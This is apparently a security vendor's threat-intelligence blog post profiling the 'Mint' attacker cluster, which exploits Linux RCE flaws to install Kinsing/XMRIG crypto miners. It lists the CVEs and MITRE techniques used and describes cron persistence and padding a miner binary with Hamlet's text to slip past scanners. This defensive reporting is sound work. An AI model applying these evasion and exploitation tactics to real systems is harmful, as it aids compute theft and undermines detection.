Before diving into this first activity cluster, be sure to read the series introduction here.
And continue with the rest of the series by clicking the links below:
- Cluster 2: Mint Sprinkles
- Cluster 3: Strawberry
- Cluster 4: Strawberry Sprinkles
- Cluster 5: Pistachio
Our first activity cluster is known as Mint.
This is a flavor of attackers who use remote code execution exploits (RCE) targeting Linux machines to upload crypto miners to vulnerable Linux systems.
Mint’s actions had been observed previously, but we first started paying close attention to them as a threat group at the beginning of January 2020 when they began a campaign exploiting CVE-2019-19781, a vulnerability discovered in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. It allowed an attacker to remotely execute code without the need for any precursors, such as authentication into the system.
Unauthenticated RCEs are always the most serious of vulnerabilities, as it grants an attacker immediate control over a system in seconds, with no prerequisites required.
The vulnerability was on the radar of Alert Logic researchers and threat hunters when it was announced on December 17, 2019. As a result, wideband telemetry signatures were deployed and flagged as a candidate for hunts. Like all wideband hunting telemetry, they captured an excessive amount of benign information as the net is cast wide. These signatures captured network data (full payload capture), so our SOC threat experts (TSX) could sift through the requests and responses sent to and from the Citrix devices. This creates a feedback loop that allows threat researchers to refine the telemetry signatures.
Initial reviews of these signatures did not yield any results. It was only after January 10, 2020, where a PoC was publicly available, that we started to see our customers getting targeted with the exploit. This a common pattern, as initially very few know the specific method to successfully exploit a vulnerability, even though both attackers and defenders may be aware a vulnerability exists in a system.
Regardless, once it is out there, malicious actors use the PoC string and create derivatives to exploit and avoid detection or prevention.
The Mint Ice Cream flavor was first confirmed when an Alert Logic threat hunter identified a malware dropper with a naming convention related to the Citrix RCE and following a two-character “XX.sh” naming formula. It was then verified that the infected machine was a Citrix ADC. The dropper sought to kill any miners already present, setting up persistence mechanisms via Cron Jobs, before dropping an Executable and Linkable Format (ELF), to begin mining crypto currency (XMRIG miner).
We observed similar activity in April 2020 as part of the SaltStack campaign, although an interesting new tactic was discovered once access has been gained using the SaltStack RCE.
Mint TTP Evolution
Attackers evolve as they attempt to evade security controls and interestingly, this time, the ELF contained the whole of Shakespeare’s Hamlet amongst the code. While fun, the Shakespearean tragedy is likely to have served as a padder, meaning analytical tools would see the file as mostly benign, as the majority was un-executable text. This meant that tools which flag/block based on the percentage of malicious content identified, would not be confident enough to block the file. Considering their goal, it is no wonder they chose Shakespeare’s longest play.
“Though this be madness, yet there is method in’t.”
– Hamlet Act 2, Scene 2, 193-206
The tactical evolution became part of the Mint strategy. It was observed again in October 2020 when the Oracle WebLogic RCE was discovered, and again in August 2021, exploiting the Atlassian Confluence flaw.
The activity that we have observed involves Russian IP addresses throughout, with IP addresses associated to former Soviet states involved in the installation phases. While this information is helpful for tracking and hunting activity related to this flavor, it is important to emphasize that this is not attribution to a nation, as IP addresses can be easily spoofed.
Their overall objective has been to install crypto miners onto vulnerable systems, hijacking their compute power to provide a steady stream of cryptocurrency to the attackers’ wallets. We have referred to the ELF file internally as a GO-LNG Miner, however it is widely known as Kinsing in the security community.
Mint continues to look for the latest RCE vulnerability to gain initial access. More recently, at the end of 2021 into 2022, this flavor was very active during the Log4j saga in an attempt to capitalize on the abundance of java-based applications likely to have been bundled with the vulnerable open source logging module.
Despite capitalizing on the latest exploit, hoping to catch vulnerable systems before the next patch cycle, and demonstrating the ability to adapt TTPs when necessary, elements of the subsequent techniques and actions are consistent. The same two configurations for mining have been consistently observed, alongside other common methods and indicators in the C2 and installation phases, allowing us to confidently cluster the activity under the flavor: Mint.
Our understanding and routine tracking of this threat activity has facilitated numerous detections and remediation plans for this group in our customer base.
Known Exploits Used
- Kubernetes misconfigurations
- CVE-2017-9841 – PHP Eval
- CVE-2019-9082 – ThinkPHP
- CVE-2019-19781 – Citrix RCE
- CVE-2020-11651 – SaltStack Authentication Bypass
- CVE-2020-7961 – Liferay
- CVE-2020-5902 BIG-IP TMUI RCE Vulnerability
- CVE-2020-15505 – MobileIron Core & Connector
- CVE-2020-14882/CVE-2020-14750 – Web Logic
- CVE-2020-11854 – Micro Focus
- CVE-2021-3129 – Laravel Ignition
- CVE-2021-26084 – Confluence
- CVE-2021-41773 – Apache
- Active Scanning – T1595 [recon]
- Exploit Public-Facing Application – T1190 [recon/delivery/exploit]
- Scheduled Task/Job: Cron – T1053.003 [inst persistence]
- Ingress Tool Transfer – T1105 [inst / C2]
- Application Layer Protocol – T1071 [C2]
- Resource hijacking – T1496 [AoO]
- Vulnerable and exposed servers
- Linux servers
- Indiscriminate of business sector
- Russian ASOs used throughout
- Ex-Soviet state ASOs used during installation phase
Actions on Objectives
- Crypto mining (XMRIG)
Next in the series: